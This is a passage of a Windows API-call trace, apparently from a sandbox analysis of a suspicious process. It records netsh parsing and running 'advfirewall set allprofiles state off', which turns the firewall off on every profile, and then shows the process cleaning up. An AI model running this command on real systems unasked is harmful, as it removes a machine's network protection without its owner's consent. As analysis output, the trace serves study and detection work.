(HeapHandle=0x270000, Flags=0x0, Size=0x4c) returned 0x2dd9d0 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e71a0 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e71c0 [0195.135] wcscpy_s (in: _Destination=0x2e71c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f92f0 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bdd80 [0195.135] wcscpy_s (in: _Destination=0x2bdd80, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9310 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9330 [0195.136] wcscpy_s (in: _Destination=0x2f9330, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9350 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f9370 [0195.136] wcscpy_s (in: _Destination=0x2f9370, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9390 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bdda0 [0195.136] wcscpy_s (in: _Destination=0x2bdda0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2dd9d0 | out: hHeap=0x270000) returned 1 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7140 | out: hHeap=0x270000) returned 1 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7140 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f93b0 [0195.136] wcscpy_s (in: _Destination=0x2f93b0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e71c0 | out: hHeap=0x270000) returned 1 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e71a0 | out: hHeap=0x270000) returned 1 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e71a0 [0195.136] GetProcessHeap () returned 0x270000 [0195.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e71c0 [0195.136] wcscpy_s (in: _Destination=0x2e71c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f93b0 | out: hHeap=0x270000) returned 1 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7140 | out: hHeap=0x270000) returned 1 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7140 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bddb0 [0195.137] wcscpy_s (in: _Destination=0x2bddb0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bdd80 | out: hHeap=0x270000) returned 1 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f92f0 | out: hHeap=0x270000) returned 1 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f92f0 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f93b0 [0195.137] wcscpy_s (in: _Destination=0x2f93b0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9330 | out: hHeap=0x270000) returned 1 [0195.137] GetProcessHeap () returned 0x270000 [0195.137] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9310 | out: hHeap=0x270000) returned 1 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9310 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f9330 [0195.138] wcscpy_s (in: _Destination=0x2f9330, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9370 | out: hHeap=0x270000) returned 1 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9350 | out: hHeap=0x270000) returned 1 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9350 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bdd80 [0195.138] wcscpy_s (in: _Destination=0x2bdd80, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bdda0 | out: hHeap=0x270000) returned 1 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9390 | out: hHeap=0x270000) returned 1 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x30) returned 0x2fa220 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f9390 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9370 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bdda0 [0195.138] GetProcessHeap () returned 0x270000 [0195.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f93d0 [0195.138] GetProcessHeap () returned 0x270000 [0195.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f93f0 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bddc0 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f9410 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2f9410, Size=0xe) returned 0x2f9430 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2f9430, Size=0x24) returned 0x2f6bc0 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2f6bc0, Size=0x26) returned 0x2f6bf0 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2f6bf0, Size=0x2c) returned 0x2fa260 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2fa260, Size=0x2e) returned 0x2fa2a0 [0195.139] GetProcessHeap () returned 0x270000 [0195.139] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2fa2a0, Size=0x44) returned 0x2dcc90 [0195.140] GetProcessHeap () returned 0x270000 [0195.140] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2dcc90, Size=0x46) returned 0x2dcce0 [0195.140] GetProcessHeap () returned 0x270000 [0195.140] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2dcce0, Size=0x50) returned 0x2dd9d0 [0195.140] GetProcessHeap () returned 0x270000 [0195.140] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2dd9d0, Size=0x52) returned 0x2dda90 [0195.140] GetProcessHeap () returned 0x270000 [0195.140] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2dda90, Size=0x58) returned 0x2dd9d0 [0195.345] GetProcessHeap () returned 0x270000 [0195.345] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2dd9d0 | out: hHeap=0x270000) returned 1 [0195.345] _wcsnicmp (_String1="Advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0195.346] _wcsnicmp (_String1="Advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0195.346] _wcsnicmp (_String1="Advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0195.346] _wcsnicmp (_String1="Advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0195.346] _wcsnicmp (_String1="Advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9430 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9410 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x58) returned 0x2dd9d0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9450 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f9470 [0195.346] wcscpy_s (in: _Destination=0x2f9470, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9490 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f94b0 [0195.346] wcscpy_s (in: _Destination=0x2f94b0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f94d0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bddd0 [0195.346] wcscpy_s (in: _Destination=0x2bddd0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f94f0 [0195.346] GetProcessHeap () returned 0x270000 [0195.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9510 [0195.347] wcscpy_s (in: _Destination=0x2f9510, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9530 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2f9550 [0195.347] wcscpy_s (in: _Destination=0x2f9550, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f9570 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2bdde0 [0195.347] wcscpy_s (in: _Destination=0x2bdde0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2dd9d0 | out: hHeap=0x270000) returned 1 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9410 | out: hHeap=0x270000) returned 1 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f94b0 | out: hHeap=0x270000) returned 1 [0195.347] GetProcessHeap () returned 0x270000 [0195.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2f94b0 [0195.347] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0195.347] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0195.347] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0195.347] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0195.347] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0195.347] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0195.347] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0195.347] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0195.347] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0195.347] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0195.348] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0195.348] _wcsnicmp (_String1="allprofiles", _String2="help", _MaxCount=0xb) returned -7 [0195.348] _wcsnicmp (_String1="allprofiles", _String2="?", _MaxCount=0xb) returned 34 [0195.348] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x667d0 | out: _String="domainprofile", _Context=0x667d0) returned="domainprofile" [0195.348] _wcsnicmp (_String1="allprofiles", _String2="domainprofi", _MaxCount=0xb) returned -3 [0195.348] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x66800 | out: _String="privateprofile", _Context=0x66800) returned="privateprofile" [0195.348] _wcsnicmp (_String1="allprofiles", _String2="privateprof", _MaxCount=0xb) returned -15 [0195.348] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x66830 | out: _String="publicprofile", _Context=0x66830) returned="publicprofile" [0195.348] _wcsnicmp (_String1="allprofiles", _String2="publicprofi", _MaxCount=0xb) returned -15 [0195.348] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x66860 | out: _String="currentprofile", _Context=0x66860) returned="currentprofile" [0195.348] _wcsnicmp (_String1="allprofiles", _String2="currentprof", _MaxCount=0xb) returned -2 [0195.348] wcstok (in: _String="allprofiles", _Delimiter=" ", _Context=0x5c530 | out: _String="allprofiles", _Context=0x5c530) returned="allprofiles" [0195.348] _wcsnicmp (_String1="allprofiles", _String2="allprofiles", _MaxCount=0xb) returned 0 [0195.348] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0201.646] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x243390, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0201.646] FormatMessageW (in: dwFlags=0x500, lpSource=0x243390, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x243370, nSize=0x0, Arguments=0x243380 | out: lpBuffer="蘰/") returned 0x5 [0201.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0201.646] GetConsoleOutputCP () returned 0x1b5 [0201.646] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0201.646] GetProcessHeap () returned 0x270000 [0201.646] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x6) returned 0x2bddf0 [0201.646] GetConsoleOutputCP () returned 0x1b5 [0201.647] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x2bddf0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0201.647] WriteFile (in: hFile=0x7, lpBuffer=0x2bddf0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x243320, lpOverlapped=0x0 | out: lpBuffer=0x2bddf0*, lpNumberOfBytesWritten=0x243320*=0x5, lpOverlapped=0x0) returned 1 [0201.647] GetProcessHeap () returned 0x270000 [0201.647] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bddf0 | out: hHeap=0x270000) returned 1 [0201.647] LocalFree (hMem=0x2f8630) returned 0x0 [0201.648] FormatMessageW (in: dwFlags=0x500, lpSource=0x1351504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x2473a0, nSize=0x0, Arguments=0x2473b0 | out: lpBuffer="鐐/") returned 0x2 [0201.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0201.648] GetConsoleOutputCP () returned 0x1b5 [0201.648] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0201.648] GetProcessHeap () returned 0x270000 [0201.648] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x3) returned 0x2bddf0 [0201.648] GetConsoleOutputCP () returned 0x1b5 [0201.648] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x2bddf0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0201.648] WriteFile (in: hFile=0x7, lpBuffer=0x2bddf0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x247350, lpOverlapped=0x0 | out: lpBuffer=0x2bddf0*, lpNumberOfBytesWritten=0x247350*=0x2, lpOverlapped=0x0) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bddf0 | out: hHeap=0x270000) returned 1 [0201.649] LocalFree (hMem=0x2f9410) returned 0x0 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9390 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9370 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bdda0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f93d0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f93f0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bddc0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2fa220 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e71c0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e71a0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bddb0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7140 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f93b0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f92f0 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9330 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9310 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bdd80 | out: hHeap=0x270000) returned 1 [0201.649] GetProcessHeap () returned 0x270000 [0201.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f9350 | out: hHeap=0x270000) returned 1 [0201.650] GetProcessHeap () returned 0x270000 [0201.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7120 | out: hHeap=0x270000) returned 1 [0201.650] GetProcessHeap () returned 0x270000 [0201.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7180 | out: hHeap=0x270000) returned 1 [0201.650] GetProcessHeap () returned 0x270000 [0201.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7160 | out: hHeap=0x270000) returned 1 [0201.650] GetProcessHeap () returned 0x270000 [0201.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7100 | out: hHeap=0x270000) returned 1 [0202.167] GetProcessHeap () returned 0x270000 [0202.167] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cf410 | out: hHeap=0x270000) returned 1 [0202.168] FreeLibrary (hLibModule=0x1350000) returned 1 [0202.168] FreeLibrary (hLibModule=0x7fef2f70000) returned 1 [0202.183] free (_Block=0x4f7e00) [0202.185] LocalFree (hMem=0x294550) returned 0x0 [0202.185] LocalFree (hMem=0x2948a0) returned 0x0 [0202.185] LocalFree (hMem=0x2949b0) returned 0x0 [0202.185] LocalFree (hMem=0x293050) returned 0x0 [0202.185] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x294550 [0202.185] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x293050 [0202.185] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2f6a70 [0202.185] free (_Block=0x4f5a70) [0202.185] free (_Block=0x0) [0202.185] free (_Block=0x37dfa0) [0202.185] free (_Block=0x4f5a90) [0202.185] free (_Block=0x4f7de0) [0202.186] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2fd6c0 [0202.191] LocalFree (hMem=0x2fd6c0) returned 0x0 [0202.191] LocalFree (hMem=0x2949d0) returned 0x0 [0202.191] LocalFree (hMem=0x294550) returned 0x0 [0202.192] free (_Block=0x4f7bd0) [0202.192] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefdee0000 [0202.192] FreeLibrary (hLibModule=0x7fefdee0000) returned 1 [0202.192] LocalFree (hMem=0x2f6a70) returned 0x0 [0202.192] LocalFree (hMem=0x293050) returned 0x0 [0202.192] GlobalHandle (pMem=0x294330) returned 0x8b0008 [0202.192] GlobalUnlock (hMem=0x8b0008) returned 0 [0202.198] FreeLibrary (hLibModule=0x7fef91b0000) returned 1 [0202.198] FreeLibrary (hLibModule=0x7fef91a0000) returned 1 [0202.217] FreeLibrary (hLibModule=0x7fef33e0000) returned 1 [0202.218] FreeLibrary (hLibModule=0x7fef33d0000) returned 1 [0202.219] FreeLibrary (hLibModule=0x7fef33a0000) returned 1 [0202.220] FreeLibrary (hLibModule=0x7fef3160000) returned 1 [0202.220] FreeLibrary (hLibModule=0x7fef3390000) returned 1 [0202.221] FreeLibrary (hLibModule=0x7fef3100000) returned 1 [0202.222] FreeLibrary (hLibModule=0x7fef86c0000) returned 1 [0202.223] FreeLibrary (hLibModule=0x7fef86b0000) returned 1 [0202.238] FreeLibrary (hLibModule=0x7fef4d60000) returned 1 [0202.239] FreeLibrary (hLibModule=0x7fef4d40000) returned 1 [0202.240] FreeLibrary (hLibModule=0x7fef4c30000) returned 1 [0202.247] FreeLibrary (hLibModule=0x7fef3000000) returned 1 [0202.372] FreeLibrary (hLibModule=0x7fef2bc0000) returned 1 [0202.376] FreeLibrary (hLibModule=0x7fef2990000) returned 1 [0202.376] FreeLibrary (hLibModule=0x7fef2960000) returned 1 [0202.699] FreeLibrary (hLibModule=0x7fef2830000) returned 1 [0202.700] FreeLibrary (hLibModule=0x7fef2800000) returned 1 [0202.711] FreeLibrary (hLibModule=0x7fef2710000) returned 1 [0202.712] GetProcessHeap () returned 0x270000 [0202.712] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2c51b0 | out: hHeap=0x270000) returned 1 [0202.712] GetProcessHeap () returned 0x270000 [0202.712] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2907a0 | out: hHeap=0x270000) returned 1 [0202.712] GetProcessHeap () returned 0x270000 [0202.712] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2907c0 | out: hHeap=0x270000) returned 1 [0202.712] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2907e0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290800 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290820 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290840 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290890 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2908b0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2908d0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2908f0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290910 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] 